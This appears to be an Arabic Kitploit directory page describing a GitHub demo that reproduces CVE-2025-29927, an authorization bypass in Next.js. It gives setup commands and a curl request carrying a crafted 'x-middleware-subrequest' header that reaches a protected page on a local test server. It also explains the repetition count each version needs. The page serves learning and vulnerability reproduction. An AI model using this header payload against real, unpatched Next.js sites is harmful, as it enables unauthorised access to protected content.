Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-29927-demo — عرض توضيحي لإعادة إنتاج ثغرة تجاوز التفويض CVE-2025-29927 في Next.js. | Kitploit
أدوات/GitHubGitHub/t3tra-dev/cve-2025-29927-demo
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubt3tra-dev/cve-2025-29927-demo

cve-2025-29927-demo

عرض توضيحي لإعادة إنتاج ثغرة تجاوز التفويض CVE-2025-29927 في Next.js.

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2025-29927-demo

هذا عرض توضيحي لإعادة إنتاج ثغرة تجاوز التفويض في Next.js.

لمزيد من التفاصيل حول هذه الثغرة، راجع ملخص ثغرة Next.js CVE-2025-29927.

طريقة إعادة إنتاج الثغرة

  1. استنسخ هذا المستودع.
root@kitploit:~
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
  1. شغّل الخادم.
root@kitploit:~
npm install
npm run dev
  1. أرسل طلبًا يتضمن ترويسة x-middleware-subrequest باستخدام curl أو ما شابه ذلك.
root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected

سيؤدي هذا إلى حدوث تجاوز للتفويض، وستتمكن من الوصول إلى صفحة /protected.

قيمة middleware هي اسم الوسيط (middleware) الذي يتعرف عليه Next.js. نظرًا لوجود وسيط باسم middleware في هذا التطبيق التجريبي، فإن تحديد هذه القيمة يؤدي إلى حدوث تجاوز للتفويض.

[!TIP] في Next.js 15.x، تم تعيين MAX_RECURSION_DEPTH إلى 5، لذلك يجب تكرار قيمة middleware مفصولة بـ : خمس مرات أو أكثر. في الإصدارات الأقدم (14.x)، كان يكفي استخدام « middleware » فقط. نظرًا لأن هذا التطبيق التجريبي يستخدم Next.js 15.2.2، فإن هذه القيمة مطلوبة.

تنزيل الأداة